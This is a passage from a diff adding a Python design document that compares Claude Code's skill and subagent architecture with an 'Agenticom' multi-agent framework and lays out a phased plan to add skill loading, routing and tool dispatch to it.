+  │  Can spawn subagents│  No                  │  No (cannot nest)        │
+  │  Context isolation  │  No                  │  Yes                     │
+  │  Best for           │  Domain knowledge    │  Long/parallel/isolated  │
+  │                     │  + short workflows   │  tasks                   │
+  │  SKILL.md extras    │  (standard fields)   │  + tools, model, hooks   │
+  └─────────────────────┴──────────────────────┴──────────────────────────┘
+
+  Subagent SKILL.md extra frontmatter fields:
+    tools: Read, Grep, Glob, Bash      # which tools the subagent can use
+    model: inherit                     # which LLM (haiku | sonnet | opus)
+    hooks:                             # PreToolUse hooks for validation
+      PreToolUse:
+        - matcher: "Bash"
+          hooks: [{{type: command, command: ./validate.sh}}]
+"""
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART B  Claude Code's agentic workflow design
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_B = f"""
+{box("PART B  —  Claude Code's Agentic Workflow Design")}
+
+{section("B1. The core agentic loop")}
+
+  Claude Code is NOT a complex multi-module system.
+  Its power comes from a SINGLE while-loop with a focused toolkit.
+
+  Agentic loop (4 phases, repeating):
+  ┌────────────────────────────────────────────────────────────────────────┐
+  │  1. GATHER CONTEXT   → file reads, searches, bash queries             │
+  │  2. TAKE ACTION      → edit files, run code, call MCPs               │
+  │  3. VERIFY WORK      → linting, tests, diff checks, LLM judgment     │
+  │  4. ITERATE          → repeat until stopping condition met           │
+  └────────────────────────────────────────────────────────────────────────┘
+
+  Stopping condition: Model stops calling tools (not an explicit signal).
+
+  Tool inventory — deliberately minimal, only 14 tools:
+    Command execution (4):  Bash, Task, TaskOutput, TaskStop
+    File operations  (6):  Read, Write, Edit, Glob, Grep, NotebookEdit
+    Web interaction  (2):  WebFetch, WebSearch
+    Workflow control (2):  AskUserQuestion, ExitPlanMode
+
+  Design principle: FOCUSED TOOLKIT over comprehensive coverage.
+  Fewer tools = simpler reasoning = fewer mistakes.
+
+{section("B2. Context management patterns")}
+
+  PATTERN 1: TODO lists as planning anchors
+    Claude creates a TODO list at the start of complex tasks.
+    Updates it throughout. This serves as:
+      (a) Internal planning documentation
+      (b) UX feedback for the user
+      (c) State recovery if context compacts
+    The tool result itself reminds Claude: "keep using the TODO list"
+    → instructions embedded in tool results, not just system prompt.
+
+  PATTERN 2: System reminders for continuity
+    Periodic system reminders re-orient the agent during long sessions
+    spanning hundreds of steps. Dynamically generated to reflect
+    current task state, not a static system prompt.
+
+  PATTERN 3: Subagent dispatching for context isolation
+    Claude spawns subagents via the Task tool for:
+      (a) Operations that produce verbose output (test suites, logs)
+      (b) Parallel independent investigations
+      (c) Tasks that would exhaust the main context window
+    Each subagent has its own fresh context window.
+    Subagent results → only summary returns to main conversation.
+
+  PATTERN 4: Auto-compaction
+    When approaching ~95% of context window → compaction triggers
+    Previous conversation is summarized → only summary kept
+    Subagent transcripts stored separately at ~/.claude/projects/.../subagents/
+
+{section("B3. The 'prepare vs execute' distinction")}
+
+  SKILLS PREPARE agents; they don't execute for them.
+
+  Traditional tool (MCP/function call):
+    Agent says: "call web_search('query')"
+    → Runtime executes the actual search
+    → Results returned to agent
+
+  Skill (Claude Code model):
+    Agent reads: cat .claude/skills/web-research/SKILL.md
+    → Instructions enter context: "when doing web research, always..."
+    → Agent now KNOWS how to do web research better
+    → Agent executes the research itself using bash/WebFetch tools
+
+  Key difference:
+    Tools EXECUTE operations.
+    Skills IMPROVE HOW the agent executes with its existing tools.
+
+  Quote (Anthropic engineering blog):
+    "Skills prepare Claude to solve a problem, rather than solving it directly.
+     They're about discovery and determinism."
+
+{section("B4. Design principles behind skill-as-markdown")}
+
+  WHY MARKDOWN AND NOT CODE:
+
+  1. LLM-native: "Throw in some text and let the model figure it out."
+     LLMs are trained on text — they interpret instructions better
+     than they navigate API specifications.
+
+  2. Low barrier to contribution:
+     Anyone who can write a how-to guide can write a skill.
+     No programming required. Community-friendly.
+
+  3. Portable across agents:
+     The same SKILL.md works in Claude Code, Copilot, VS Code, OpenCode.
+     An open standard (agentskills.io) ensures cross-platform portability.
+
+  4. No token upfront:
+     The file exists on the filesystem. It costs 0 tokens unless read.
+     A project can have 100 skills installed; only the relevant ones load.
+
+  5. Composable:
+     Skills can reference each other via relative paths.
+     A skill can mention: "See [advanced guide](references/REFERENCE.md)"
+     and Claude reads that file on demand if needed.
+
+  6. Scripts as reliable automation:
+     A skill can bundle Python/Bash scripts in scripts/.
+     Claude runs them; only the OUTPUT enters context (not the script code).
+     This gives deterministic behavior without consuming context budget.
+
+{section("B5. Limitations and gaps in Claude Code's design")}
+
+  1. Semantic invocation is non-deterministic
+     Claude decides which skills to use based on description matching.
+     There is no guarantee the right skill is used for the right task.
+     You cannot FORCE a skill to activate (before v2.1).
+     You cannot PREVENT a skill from activating.
+
+  2. No performance feedback loop
+     When a skill improves output quality, Claude Code doesn't know.
+     There is NO mechanism to track which skills helped.
+     Skills cannot be promoted or demoted based on results.
+
+  3. Skills are static — they don't evolve
+     Skills are written once by humans. They cannot self-improve
+     based on actual usage patterns or failure modes.
+
+  4. Context budget is fixed at ~2% of window (~16,000 chars)
+     Skill metadata budget is shared across all installed skills.
+     Many skills → less description space per skill.
+
+  5. No per-step or per-agent scoping
+     Skills are conversation-level. Every agent in the conversation
+     sees the same skill metadata. There's no "developer agent gets
+     coding skills, verifier gets security skills" scoping.
+
+  6. Subagents cannot spawn subagents
+     Nested delegation is impossible within a single Claude Code session.
+     This limits the depth of autonomous multi-agent architectures.
+
+  7. Full context isolation has a cost
+     Subagents know nothing about the main conversation state.
+     All context must be passed explicitly as text to the subagent.
+"""
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART C  Agenticom vs Claude Code — architectural comparison
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_C = f"""
+{box("PART C  —  Agenticom vs Claude Code: Architectural Comparison")}
+
+{section("C1. Execution model differences")}
+
+  CLAUDE CODE:
+    Single agent, single context, while-loop until done.
+    Agent has TOOL ACCESS during execution (bash, file ops, web).
+    Skills load on-demand during execution via bash.
+    Flow: User → Claude → [tool calls in a loop] → Done
+
+  AGENTICOM:
+    Multi-agent team, step-by-step sequential execution (Ralph Loop).
+    Each agent produces ONE text output per step. NO tool access.
+    Context is explicit: persona + task + parent_outputs only.
+    Flow: User → Team.run() → [step1 → step2 → ... → stepN] → Done
+
+  STRUCTURAL DIFFERENCE:
+    Claude Code: one agent, many tool calls, single context
+    Agenticom:   many agents, one LLM call per step, isolated contexts
+
+{section("C2. Agenticom's execution pipeline (from codebase analysis)")}
+
+  Team.run(task)
+    ↓
+  for step in self.steps:                              # sequential
+    agent = self.agents[step.agent_role]
+    input_data = template.format(**outputs)            # {{{{task}}}}, {{{{step_outputs.X}}}}
+    context = AgentContext(parent_outputs=outputs)     # fresh every step (Ralph Loop)
+    result = await agent.execute(input_data, context)
+    outputs[step.id] = result.output                   # accumulate
+    ↓
+  LLMAgent._execute_task(task, context):
+    full_prompt = system_prompt                        # persona + role label
+    full_prompt += "\\nTask: " + task
+    if context.workspace: full_prompt += workspace_context
+    if context.parent_outputs: full_prompt += parent_context
+    return await self._executor(full_prompt, context)  # ONE LLM call → text
+    ↓
+  UnifiedExecutor → OpenClawExecutor (Anthropic API)
+
+  What agents CAN see:    persona, task, parent step outputs
+  What agents CANNOT do:  call tools, read files, execute code mid-step
+
+{section("C3. Current skills/tools gap in Agenticom")}
+
+  AgentConfig.tools field:
+    declared:  tools: list[str] = field(default_factory=list)
+    used in:   WorkflowParser reads it → passes to agent constructor
+    executed:  NOWHERE — tools are stored but never dispatched
+
+  MCPToolBridge:
+    exists:    orchestration/tools/mcp_bridge.py (861 lines)
+    status:    fully implemented, not wired into LLMAgent._execute_task()
+    comment:   "TODO: Parse result for tool calls" (line ~810)
+
+  MCPRegistry:
+    exists:    orchestration/tools/registry.py
+    maps:      ~25 tool categories → MCP server names
+    status:    working lookup, not wired into execution pipeline
+
+  CONCLUSION: Agenticom has the plumbing (AgentConfig.tools,
+              MCPToolBridge, MCPRegistry) but the pipes are not
+              connected. This is the primary gap vs Claude Code.
+
+{section("C4. What Agenticom does BETTER than Claude Code today")}
+
+  STRENGTH 1: Deterministic multi-agent orchestration
+    Agenticom's Ralph Loop gives EXPLICIT data flow between agents.
+    Each step knows exactly what previous steps produced.
+    No hallucination of prior context — it's injected as text.
+    Claude Code: single agent must remember everything in context.
+
+  STRENGTH 2: SMARC scoring — empirical performance measurement
+    After every run, SMARC scores each agent on 5 dimensions:
+      Specific, Measurable, Actionable, Realistic, Compoundable
+    Claude Code: no objective per-run quality measurement.
+
+  STRENGTH 3: Self-improving prompt evolution (PromptEvolver)
+    When SMARC gap detected → PromptEvolver generates a persona patch.
+    Patches stored in PromptVersionStore, versioned, rollback-able.
+    Claude Code: no mechanism for skills or prompts to evolve.
+
+  STRENGTH 4: Workflow-scoped configuration
+    Each YAML workflow defines its own agents, roles, retry policies.
+    Skills can be declared per-agent per-workflow.
+    Claude Code: skills are project-level, not workflow-level.
+
+  STRENGTH 5: 13 bundled workflow templates
+    feature-dev, security-assessment, due-diligence, etc.
+    Each workflow can have its own curated skill set.
+    Claude Code: user must assemble their own skill stack.
+"""
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART D  Where Agenticom can do it BETTER
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_D = f"""
+{box("PART D  —  Where Agenticom Can Do It Better")}
+
+{section("D1. BETTER: Evidence-based skill selection (vs semantic guessing)")}
+
+  CLAUDE CODE MODEL:
+    Claude reads skill descriptions at startup.
+    Claude decides which skill to use based on semantic similarity.
+    Non-deterministic. May use the wrong skill. No feedback on correctness.
+
+  AGENTICOM MODEL (proposed):
+    SMARC dimension scores identify EXACTLY which capability is failing.
+    Example: developer_output_specificity = 0.28 (LOW, 3 consecutive runs)
+    ImprovementLoop maps this gap to a specific skill category.
+    SkillGapMatcher: "low specificity for developer in a TypeScript task"
+                     → inject typescript-react-patterns skill
+    Evidence-based, not a guess. Attribution tracked in RunRecord.
+
+  WHY BETTER:
+    • Activates skills when NEEDED, not when semantically nearby
+    • Token cost justified by empirical evidence, not intuition
+    • Skills that don't improve SMARC can be rolled back automatically
+
+{section("D2. BETTER: Per-step, per-agent skill scoping")}
+
+  CLAUDE CODE MODEL:
+    Skills are CONVERSATION-LEVEL. Every agent in the conversation
+    sees the same 100-token metadata for every skill.
+    No way to say "the developer agent gets TypeScript skills
+    but the verifier agent gets security skills".
+
+  AGENTICOM MODEL (proposed):
+    Each WorkflowStep is executed by a specific agent with a specific role.
+    Skills are declared per-agent in the YAML:
+      agents:
+        - id: developer
+          skills: [typescript-react-patterns, async-python-patterns]
+        - id: verifier
+          skills: [lint-and-validate, owasp-top10]
+    WorkflowParser injects the right skill content into the right persona.
+    Tester gets test skills. Reviewer gets review skills. Precisely targeted.
+
+  WHY BETTER:
+    • Zero wasted tokens on irrelevant skills per agent
+    • Cleaner separation of concerns (each agent is a true specialist)
+    • Auditable: the YAML shows exactly which agent gets which skills
+
+{section("D3. BETTER: Skill evolution (vs static markdown)")}
+
+  CLAUDE CODE MODEL:
+    Skills are static markdown files. Humans write them, humans update them.
+    No feedback mechanism from agent performance back to skill content.
+
+  AGENTICOM MODEL (proposed):
+    PromptEvolver currently generates heuristic patches like:
+      "CRITICAL: Be more specific in your output."
+    Instead, it can use SKILL CONTENT as patch material:
+      Gap: developer_output_specificity LOW for TypeScript tasks
+      → SkillGapMatcher finds: typescript-react-patterns
+      → SkillLoader.load(skill, section="Step-by-Step", max_tokens=400)
+      → PromptEvolver._skill_propose(): extract the specificity-relevant section
+      → Inject into persona as a permanent version-controlled patch
+    Next run: SMARC scores the new persona. If improved → keep.
+    If NOT improved → rollback, try next candidate skill.
+
+  WHY BETTER:
+    • Skills improve based on actual workflow failure patterns
+    • Human-curated skills bootstrap; SMARC data refines them
+    • Full rollback capability (PromptVersionStore)
+    • Attribution: RunRecord records which skill patch was active
+
+{section("D4. BETTER: Skill attribution and feedback loop")}
+
+  CLAUDE CODE MODEL:
+    No mechanism to know if a skill helped.
+    No cross-run correlation between skill presence and output quality.
+
+  AGENTICOM MODEL (proposed):
+    RunRecord metadata field: active_skills: {{agent_id: [skill_names]}}
+    After N runs with skill active:
+      if smarc_composite(with_skill) > smarc_composite(without_skill) + 0.10:
+        skill is effective → promote (keep in persona version chain)
+        log: "skill owasp-top10 lifted verifier specificity 0.41→0.79"
+      else:
+        skill is not effective → try next candidate or LLM rewrite
+    CLI: agenticom feedback skill-report <workflow-id>
+         → shows: which skills active, gap addressed, SMARC before/after
+
+  WHY BETTER:
+    • Closes the loop: skills are measured, not assumed effective
+    • Skills compete — only the ones that work survive in the persona chain
+    • Creates a virtuous flywheel: better skills → higher SMARC → fewer patches
+
+{section("D5. BETTER: Deterministic activation (vs semantic guessing)")}
+
+  CLAUDE CODE MODEL:
+    Before v2.1: Claude decides whether to use a skill — non-deterministic.
+    After v2.1: Skills also appear as /slash-commands for explicit invocation.
+    Neither mode gives the workflow author guaranteed activation.
+
+  AGENTICOM MODEL (proposed):
+    THREE tiers with different activation guarantees:
+      TIER 1 [ALWAYS-ON]: Declared in YAML → injected at parse time → guaranteed
+      TIER 2 [KEYWORD]:   SkillRouter checks task keywords at run time
+      TIER 3 [SMARC]:     ImprovementLoop injects based on gap evidence
+    No guessing. The YAML author has full control.
+    TIER 1 is deterministic by construction — no LLM involvement in activation.
+
+  WHY BETTER:
+    • Reproducible runs: same YAML → same skills → same behavior
+    • Auditable: log shows exactly which skills were active per step
+    • Testable: write test that asserts skill X was active for agent Y
+
+{section("D6. BETTER: Deep integration with the self-improvement flywheel")}
+
+  CLAUDE CODE MODEL:
+    Skills + workflows + agent behavior: three separate concerns.
+    No system ties them together for continuous improvement.
+
+  AGENTICOM MODEL:
+    All four layers are integrated:
+
+    LAYER 1  Workflow YAML       defines which skills each agent gets (static)
+             │
+    LAYER 2  SkillRouter         selects additional skills based on task keywords
+             │
+    LAYER 3  ImprovementLoop     detects SMARC gaps → selects skills as patch material
+             │
+    LAYER 4  PromptVersionStore  persists skill-enriched personas, versioned, rollback-able
+             │
+    LAYER 5  RunRecorder         attributes SMARC improvements to specific skills
+             │
+    LAYER 6  FeedbackCLI         operator reviews, approves, or rejects skill patches
+
+    Each layer feeds the next. The flywheel:
+      Run → SMARC score → gap → skill selection → patch → next run → SMARC ↑
+      → skill confirmed → promoted → next gap → repeat
+"""
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART E  Agenticom Skill Design Blueprint
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_E = f"""
+{box("PART E  —  Agenticom Skill Design Blueprint")}
+
+{section("E1. Format: compatible with agentskills.io open standard")}
+
+  Agenticom skills should be FULLY COMPATIBLE with the Agent Skills spec.
+  This gives access to the 868+ community skills from antigravity-awesome-skills
+  and any other agentskills.io-compatible skill library.
+
+  Minimum required:
+    skills/skill-name/SKILL.md
+    ├── ---
+    ├── name: skill-name
+    ├── description: "What it does and when to use it"
+    └── ---
+    └── [body with instructions]
+
+  Agenticom-specific extensions (backward compatible):
+    Agenticom uses a YAML field in the workflow definition, not in SKILL.md:
+
+    agents:
+      - id: developer
+        skills:
+          - typescript-react-patterns   # always-on
+          - async-python-patterns       # always-on
+        conditional_skills:             # NEW: Agenticom extension
+          - skill: owasp-top10
+            when: "security or auth in task"
+          - skill: postgres-best-practices
+            when: "database or sql in task"
+        smarc_skills:                   # NEW: gap-triggered skills
+          - skill: lint-and-validate
+            trigger: output_specificity < 0.5
+
+{section("E2. Progressive disclosure in Agenticom (without a VM)")}
+
+  Claude Code has filesystem + bash access for lazy skill loading.
+  Agenticom agents have NO filesystem access during step execution.
+  We must simulate progressive disclosure differently.
+
+  AGENTICOM PROGRESSIVE DISCLOSURE MODEL:
+  ┌──────────────────────────────────────────────────────────────────────┐
+  │  Level 1 (metadata):   stored in skills/skill-name/SKILL.md         │
+  │    Used by: SkillRouter for keyword matching                        │
+  │    Token cost in persona: 0 (skill metadata not added to persona)   │
+  │    Alternative: skill_index.json built at install time              │
+  │                                                                      │
+  │  Level 2 (instructions): SKILL.md body                             │
+  │    Injected into: agent.persona at WorkflowParser parse time        │
+  │    Token cost: capped at max_tokens per skill (recommend: 400)      │
+  │    Sections extracted: "## Step-by-Step" + "## When to Use"         │
+  │                                                                      │
+  │  Level 3 (resources): skills/skill-name/scripts/*.py                │
+  │    Used via: WorkflowStep.execute field (shell command after step)  │
+  │    Example: execute: "python .agent/skills/pdf/scripts/extract.py"  │
+  │    Token cost: 0 (only stdout enters the next step's context)       │
+  └──────────────────────────────────────────────────────────────────────┘
+
+  HOW THIS WORKS without a VM:
+    The WorkflowStep already has an `execute` field for shell commands.
+    Skill scripts can be exposed as step-level shell commands.
+    The script output becomes the step's execution_output artifact.
+    The next step's agent can see this in its context.
+
+{section("E3. Three activation paths (implementation design)")}
+
+  PATH 1 — Static YAML injection (Tier 1, ALWAYS-ON)
+  ─────────────────────────────────────────────────
+  Where: WorkflowParser._parse_agent() — +8 lines
+  When:  At workflow parse time (once, zero per-run overhead)
+  How:
+    if "skills" in agent_data:
+        for skill_name in agent_data["skills"]:
+            skill_text = skill_loader.load(skill_name, max_tokens=400)
+            if skill_text:
+                agent_config.persona += f"\\n\\n## Skill: {{skill_name}}\\n{{skill_text}}"
+
+  PATH 2 — Task-time routing (Tier 2, CONDITIONAL)
+  ─────────────────────────────────────────────────
+  Where: AgentTeam.run() — before first step
+  When:  Once per team.run(task) call (< 5ms, no LLM call)
+  How:
+    for agent in self.agents.values():
+        new_persona = agent.base_persona  # stored separately from patched persona
+        selected = skill_router.select(task, agent.role, max_skills=2)
+        for skill in selected:
+            new_persona += skill_loader.load(skill, max_tokens=400)
+        agent.update_persona(new_persona, version_id="task-time")
+
+  PATH 3 — SMARC-driven patch (Tier 3, LOOP-DRIVEN)
+  ─────────────────────────────────────────────────
+  Where: ImprovementLoop._on_pattern_trigger() — enhanced
+  When:  Every N runs when SMARC gap detected (async background task)
+  How:
+    gap = "developer_output_specificity"     # e.g., score 0.28
+    skill = skill_gap_matcher.find(gap, agent_role="developer", task=task)
+    if skill:
+        skill_content = skill_loader.load(skill, section="steps", max_tokens=600)
+        patch = prompt_evolver._skill_propose(persona, skill_content, gap)
+        prompt_version_store.save_patch(patch)
+    else:
+        patch = prompt_evolver._heuristic_propose(...)  # existing fallback
+
+{section("E4. SkillLoader — the core primitive (30 lines)")}
+
+  class SkillLoader:
+      def __init__(self, skills_dirs: list[Path]):
+          self.skills_dirs = skills_dirs    # search in order
+
+      def load(
+          self,
+          skill_name: str,
+          sections: list[str] | None = None,   # None = full body
+          max_tokens: int = 400,
+      ) -> str:
+          # 1. Find skill directory
+          path = self._find_skill(skill_name)
+          if not path: return ""
+
+          # 2. Read and strip frontmatter
+          text = path.read_text(encoding="utf-8")
+          body = re.sub(r"^---.*?---\\n", "", text, flags=re.DOTALL)
+
+          # 3. Strip "ask the user" clauses (unsafe in autonomous mode)
+          body = re.sub(r"[Aa]sk the (?:user|client).*?\\n", "", body)
+
+          # 4. Extract specific sections if requested
+          if sections:
+              body = self._extract_sections(body, sections)
+
+          # 5. Cap by token budget (approx: 1 token ≈ 0.75 words)
+          words = body.split()
+          return " ".join(words[: int(max_tokens * 0.75)])
+
+      def _find_skill(self, name: str) -> Path | None:
+          for d in self.skills_dirs:
+              p = d / name / "SKILL.md"
+              if p.exists(): return p
+          return None
+
+  Search order:
+    1. .agent/skills/          (project-local, highest priority)
+    2. ~/.claude/skills/       (user-global, same as Claude Code)
+    3. agenticom/bundled_skills/ (framework defaults)
+
+{section("E5. skill_index.json — the discovery mechanism")}
+
+  Built at install time (not runtime):
+  {{
+    "typescript-react-patterns": {{
+      "description": "Expert patterns for React/TypeScript...",
+      "keywords": ["react", "tsx", "hooks", "component", "jsx", "next.js"],
+      "roles":    ["developer"],
+      "tier":     "conditional",
+      "max_tokens": 400,
+      "source":   "antigravity-awesome-skills"
+    }},
+    "owasp-top10": {{
+      "description": "OWASP Top 10 security verification checklist",
+      "keywords": ["security", "auth", "injection", "xss", "token"],
+      "roles":    ["verifier", "reviewer"],
+      "tier":     "conditional",
+      "smarc_triggers": ["output_specificity < 0.5", "output_actionability < 0.5"]
+    }}
+  }}
+
+  Built by: scripts/build_skill_index.py
+    → scans all SKILL.md files
+    → extracts name, description, infers keywords
+    → writes skill_index.json
+    → can be re-run when new skills are installed
+"""
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART F  Implementation roadmap
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_F = f"""
+{box("PART F  —  Implementation Roadmap")}
+
+{section("F1. Phase 1: Static skill injection (1-2 hours)")}
+
+  Files to create:
+    orchestration/tools/skill_loader.py     30 lines   SkillLoader class
+
+  Files to modify:
+    orchestration/workflows/parser.py       +8 lines   inject at _parse_agent()
+    agenticom/bundled_workflows/*.yaml      add skills: lists per agent
+    orchestration/agents/base.py            +3 lines   store base_persona separately
+
+  YAML workflow change:
+    agents:
+      - id: developer
+        skills:
+          - typescript-react-patterns
+          - async-python-patterns
+
+  Test:
+    python examples/case_study_01_feature_dev_self_improvement.py
+    Before: developer SMARC composite ≈ 0.65
+    After:  developer SMARC composite ≈ 0.78  (expected +0.13)
+
+  Prerequisite:
+    git clone https://github.com/sickn33/antigravity-awesome-skills .agent/skills
+    # or: npx antigravity-awesome-skills --path .agent/skills
+
+{section("F2. Phase 2: Task-time skill routing (1 day)")}
+
+  Files to create:
+    orchestration/tools/skill_router.py     50 lines   SkillRouter class
+    scripts/build_skill_index.py            40 lines   Builds skill_index.json
+
+  Files to modify:
+    orchestration/agents/team.py            +5 lines   in run() before step loop
+    orchestration/self_improvement/         +1 field   active_skills in RunRecord
+
+  SkillRouter.select(task, agent_role, max_skills=2) -> list[str]:
+    Load skill_index.json
+    Score each skill: keyword_hits * 2 + role_match
+    Return top-K with score > threshold
+
+  Result: Task "Build a Next.js login with Postgres" →
+    developer agent automatically gets:
+      typescript-react-patterns (score=5: hits next.js, react)
+      postgres-best-practices   (score=3: hits postgres)
+    WITHOUT any YAML change
+
+{section("F3. Phase 3: SMARC-driven skill injection (2 days)")}
+
+  Files to create:
+    orchestration/tools/skill_gap_matcher.py  80 lines  gap → skill mapping
+    orchestration/self_improvement/           +30 lines  _skill_propose() in evolver
+
+  Files to modify:
+    orchestration/self_improvement/
+      improvement_loop.py                     +10 lines  try skill before heuristic
+      prompt_evolver.py                       +30 lines  _skill_propose() method
+    agenticom/cli.py                          +30 lines  skill-report subcommand
+
+  Gap → skill mapping table (core of SkillGapMatcher):
+  ┌──────────────────────────────────┬──────────────────────────────────────┐
+  │  SMARC Gap                       │  Skill(s) to inject                  │
+  ├──────────────────────────────────┼──────────────────────────────────────┤
+  │  *_output_specificity < 0.5      │  lint-and-validate (any role)        │
+  │  developer_output_specificity    │  typescript-react-patterns (if TS)   │
+  │                                  │  async-python-patterns (if Python)   │
+  │  developer_output_measurability  │  postgres-best-practices (if DB)     │
+  │  verifier_output_actionability   │  owasp-top10 (security tasks)        │
+  │  verifier_output_measurability   │  agent-evaluation (AI components)    │
+  │  tester_knowledge_compoundability│  property-based-testing section      │
+  │  reviewer_knowledge_compoundability│ observability-review section       │
+  └──────────────────────────────────┴──────────────────────────────────────┘
+
+  New CLI command:
+    agenticom feedback skill-report feature-dev
+    → table: agent | skill_injected | gap_addressed | smarc_before | smarc_after | kept?
+
+{section("F4. Phase 4: Tool dispatch (2-3 days, largest change)")}
+
+  This is the most impactful change: wiring MCPToolBridge into execution.
+
+  Files to modify:
+    orchestration/agents/base.py     LLMAgent._execute_task() — parse tool calls in output
+    orchestration/tools/mcp_bridge.py  complete the TODO: Parse result for tool calls
+    orchestration/agents/team.py    _execute_step() — multi-turn tool loop
+
+  New execution model:
+    LLMAgent._execute_task(task, context):
+      full_prompt = build_prompt(task, context)
+
+      # NEW: Add tool declarations to prompt
+      if self.config.tools:
+          tool_decls = mcp_bridge.get_tool_declarations(self.config.tools)
+          full_prompt += f"\\n\\nAVAILABLE TOOLS:\\n{{tool_decls}}"
+          full_prompt += "\\nTo use a tool, output: <tool>name</tool><input>...</input>"
+
+      max_tool_rounds = 5
+      for _ in range(max_tool_rounds):
+          response = await self._executor(full_prompt, context)
+
+          # NEW: Check for tool call in response
+          tool_call = parse_tool_call(response)
+          if not tool_call:
+              return response  # Final answer (no tool call)
+
+          # Execute tool
+          tool_result = await mcp_bridge.execute(tool_call.name, tool_call.input)
+
+          # Feed result back
+          full_prompt += f"\\nAssistant: {{response}}\\nTool result: {{tool_result}}\\nUser: Continue."
+
+      return response  # Final answer after max rounds
+
+  When Phase 4 is done:
+    Agents can actually USE tools, not just declare them.
+    The developer agent can call web_search to look up a library.
+    The verifier agent can run a linting tool to check code.
+    Skills + tool access = fully capable specialist agents.
+
+{section("F5. Effort summary and expected outcomes")}
+
+  ┌──────────┬──────────────┬──────────────────┬─────────────────────────┐
+  │  Phase   │  Effort      │  Files Touched   │  Expected SMARC Lift    │
+  ├──────────┼──────────────┼──────────────────┼─────────────────────────┤
+  │  1       │  2 hours     │  3 new + 3 edit  │  dev +0.13, ver +0.15   │
+  │  2       │  1 day       │  2 new + 2 edit  │  +0.05 (adaptive)       │
+  │  3       │  2 days      │  2 new + 3 edit  │  +0.08 (evidence-based) │
+  │  4       │  2-3 days    │  3 edit          │  +0.15 (tool access)    │
+  ├──────────┼──────────────┼──────────────────┼─────────────────────────┤
+  │  TOTAL   │  ~5-6 days   │  7 new + 11 edit │  +0.41 team composite   │
+  └──────────┴──────────────┴──────────────────┴─────────────────────────┘
+
+  Token overhead (Phase 1+2, capped at 400 tok/skill):
+    4 agents × 2 skills × 400 tokens = 3,200 tokens per run
+    At $3/M tokens: $0.010 per run overhead
+    Break-even vs wasted retry LLM call: ~7 runs
+"""
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  SUMMARY
+# ─────────────────────────────────────────────────────────────────────────────
+
+SUMMARY = f"""
+{box("SUMMARY  —  Key Conclusions")}
+
+  WHAT Claude Code's skill system is:
+    • An OPEN STANDARD (agentskills.io), not a proprietary format
+    • Markdown instruction documents, NOT executable code
+    • Progressive disclosure: 100-token metadata at startup, full body on demand
+    • Skill activation: semantic (Claude decides) or explicit (/slash-command)
+    • Skill content loads via bash cat command — NOT injected into system prompt
+    • Scripts in skills/ execute via bash; only output enters context (zero cost)
+
+  WHAT Claude Code's agentic workflow is:
+    • A simple while-loop: gather → act → verify → repeat
+    • 14 focused tools (deliberately minimal)
+    • Context isolation via subagents (each has own context window)
+    • Skills PREPARE agents; tools EXECUTE for them
+    • Subagents ≠ Skills: isolated context vs main context
+
+  WHERE Agenticom is DIFFERENT:
+    • Multi-agent sequential pipeline (Ralph Loop) vs single-agent while-loop
+    • No tool access during step execution (vs bash/file/web in Claude Code)
+    • SMARC scoring after each run (Claude Code has no performance measurement)
+    • Self-improving prompts (PromptEvolver) — unique to Agenticom
+    • Workflow-scoped YAML configuration (Claude Code is project-level)
+
+  WHERE Agenticom can be BETTER:
+    ✓  Evidence-based skill selection (SMARC scores → skill routing)
+    ✓  Per-step, per-agent skill scoping (YAML-controlled, not semantic)
+    ✓  Skill evolution (PromptEvolver uses skills as patch material)
+    ✓  Skill attribution (RunRecord tracks which skills helped)
+    ✓  Deterministic activation (Tier 1 = guaranteed, Tier 2 = keyword, Tier 3 = SMARC)
+    ✓  Deep flywheel integration (skills + SMARC + PromptEvolver + VersionStore)
+
+  RECOMMENDED IMPLEMENTATION ORDER:
+    Phase 1 (today):    SkillLoader + WorkflowParser injection (2 hours)
+    Phase 2 (day 2):    SkillRouter + task-time routing (1 day)
+    Phase 3 (day 3-4):  SkillGapMatcher + loop-driven injection (2 days)
+    Phase 4 (day 5-7):  MCPToolBridge wired into LLMAgent (2-3 days)
+
+  CONCRETE FIRST STEP:
+    git clone https://github.com/sickn33/antigravity-awesome-skills .agent/skills
+    → then implement orchestration/tools/skill_loader.py (30 lines)
+    → then add +8 lines to orchestration/workflows/parser.py
+    → then add skills: lists to agenticom/bundled_workflows/feature-dev.yaml
+    → run case_study_01 and observe SMARC before/after
+
+  Next exploration:
+    python examples/exploration_03_tool_dispatch_mcp_wiring.py
+      → Deep dive into wiring MCPToolBridge into LLMAgent._execute_task()
+         (Phase 4 — giving agents REAL tool execution capability)
+"""
+
+
+# ─────────────────────────────────────────────────────────────────────────────
+#  PART G  Corrections & deeper details (from official docs deep-dive)
+# ─────────────────────────────────────────────────────────────────────────────
+
+PART_G = f"""
+{box("PART G  —  Corrections & Deeper Details (Official Docs)")}
+
+{section("G1. The Skill tool is a META-TOOL, not individual tools")}
+
+  CORRECTION to Part A: Skills do NOT load via bare "bash cat" commands.
+
+  Claude Code has a single meta-tool named "Skill" with a `command` parameter:
+    Skill(command="pdf-processing")
+
+  The Skill tool's description contains a dynamically generated block:
+    <available_skills>
+      pdf-processing: Extract text and tables from PDF files...
+      typescript-react-patterns: Expert patterns for React/TypeScript...
+      ...
+    </available_skills>
+
+  Character budget for this block: 16,000 chars (scaled to 2% of context window).
+  If installed skills exceed budget, some are excluded. Claude warns via /context.
+
+  Claude selects which skill to invoke by pure LLM reasoning —
+  reading the <available_skills> block and deciding which (if any) to call.
+  No embedding similarity, no algorithmic routing, pure language model judgment.
+
+{section("G2. Skill invocation uses TWO-MESSAGE injection")}
+
+  When Claude calls Skill(command="skill-name"), two messages are injected:
+
+  Message 1  (visible in UI):
+    <command-message>The "skill-name" skill is loading</command-message>
+    ← What the user sees in the chat interface
+
+  Message 2  (hidden from UI, visible to model):
+    [complete SKILL.md body content]
+    ← Raw instructional text the model receives
+
+  The body is NOT injected via bash. It is inserted directly as a hidden
+  user message into the conversation. This means:
+    (a) The model always has the full skill body once activated
